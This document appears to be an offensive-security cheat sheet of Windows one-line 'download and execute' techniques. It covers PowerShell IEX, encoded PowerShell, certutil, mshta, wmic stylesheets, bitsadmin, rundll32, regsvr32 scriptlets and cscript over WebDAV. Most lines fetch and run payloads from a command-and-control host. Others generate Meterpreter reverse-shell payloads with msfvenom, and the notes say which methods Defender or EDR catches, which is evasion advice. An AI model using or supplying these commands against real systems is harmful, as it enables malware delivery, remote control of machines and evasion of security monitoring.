Single line commands to download and execute malicious code are useful for a number of reasons;
- To exploit web application vulnerabilities, such as shell command injection
- When you have the ability to execute commands, but not directly copy files (via WMI for instance)
- To embed in other attack packages, such as Macro based malware or USB HID attacks
Having multiple techniques is useful, as endpoint detection and response systems will typically use pattern matching rules to detect some of these.
PowerShell IEX Payload
The Powershell Invoke-Expression function can be used to load Powershell code from a webserver. This is very likely to be detected by EDR solutions.
1 | powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString(‘http://www.c2server.co.uk/script.ps1’); |
PowerShell IEX (Proxy Aware)
The below version ensures the host systems default web proxy is used for communication:
1 | powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://c2server.co.uk/script.ps1')|iex" |
Base64 Encoded Powershell
Powershell can be Base64 encoded and executed as part of a one liner. This is particularly useful when exploiting web application vulnerabilities. To encode PowerShell scripts using a Linux system, the following command can be used:
1 | iconv -f ASCII -t UTF-16LE powershellscript.txt | base64 | tr -d "\n" |
The resulting code can be executed using:
1 | Powershell -W Hidden -nop -noni -enc <base64 text> |
Certutil
Certutil is a command line program bundled with Windows that is typically used to manage cryptographic certificates. It can also be used to download files from the Internet.
Windows Defender picks up on this technique.
1 | certutil -urlcache -split -f http://www.c2server.co.uk/bg.exe bg.exe && bg.exe. |
MSHTA
Mshta.exe is a utility that executes Microsoft HTML Applications (HTA) files
1 | mshta http://www.c2server.co.uk/script.hta |
WMIC
Windows Management Instrumentation Command (WMIC) retrieves information about local or remote computers.
Windows Defender picks up on this technique.
1 | wmic os get /format:"http://www.c2server.co.uk/stylesheet.xsl" |
Payload Generation
Stylesheet to load calc.exe:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 | <xsl:stylesheet xmlns:xsl="http://www.w3.org/TR/WD-xsl"><xsl:script language="VBScript"><![CDATA[Set shl = CreateObject("Wscript.Shell")Call shl.Run("""calc.exe""")]]></xsl:script><xsl:template match="/"><xsl:apply-templates select="//RESULTS"/><xsl:apply-templates select="//INSTANCE"/><xsl:eval no-entities="true" language="VBScript">DisplayValues(this)</xsl:eval></xsl:template><xsl:template match="RESULTS"><xsl:eval no-entities="true" language="VBScript">CountResults(this)</xsl:eval></xsl:template><xsl:template match="INSTANCE"><xsl:eval language="VBScript">GotInstance()</xsl:eval><xsl:apply-templates select="PROPERTY|PROPERTY.ARRAY|PROPERTY.REFERENCE"/></xsl:template></xsl:stylesheet> |
Bitsadmin
The Background Intelligent Transfer Service (BITS), which is normally used to download Windows updates can retrieve files from a remote server.
1 | bitsadmin /rawreturn /transfer payload http://www.c2server/bg.exe %cd%\bg.exe && bg.exe |
If you get an error like 0x80070057, this may be because the output path is incorrectly specified, or isn’t writable.
Rundll32
Malicious DLL files can be executed directly using rundll32.exe. DLL’s are often not interogated to the same extent as executables by EDR solutions;
1 | rundll32 \\webdavserver\folder\payload.dll,DLLMain |
Payload Generation
1 | msfvenom -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=4444 -f DLL > /var/www/webdav/payload.dll |
Regsvr32
Windows Defender picks up on this technique.
1 | regsvr32 /u /n /s /i:http://www.c2server.co.uk/test.html scrobj.dll |
Payload Generation
Contents of test.html:
1 2 3 4 5 6 7 8 | <?XML version="1.0"?><scriptlet><registrationprogid="foo"classid="{F0001111-0000-0000-0000-0000FEEDACDC}" ><script language="JScript"><![CDATA[var r = new ActiveXObject("WScript.Shell").Run("cmd /k echo bordergate_test");]]></script></registration></scriptlet> |
Cscript
Malicious C# code can be embedded within vbs files using DotNetToJScript. VBS files can be loaded over a WebDav share:
1 | cscript //E:vbscript \\www.c2server.co.uk\webdav\test.vbs |
WebDav Share Configuration in Kali
1 2 3 | sudo apt install -y davfs2sudo a2enmod davsudo a2enmod dav_fssudo mkdir /var/www/webdavsudo chown -R www-data:www-data /var/www/ |
Edit Apache Config File
/etc/apache2/sites-available/000-default.conf
Add to top of file:
1 | DavLockDB /var/www/DavLock |
Add to VirtualHost section:
1 2 3 4 | Alias /webdav /var/www/webdav<Directory /var/www/webdav>DAV On</Directory> |
Testing
1 | cadaver http://127.0.0.1/webdav |
Generate VBS Meterpreter
1 | msfvenom -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=4444 -f vbs --arch x86 --platform win |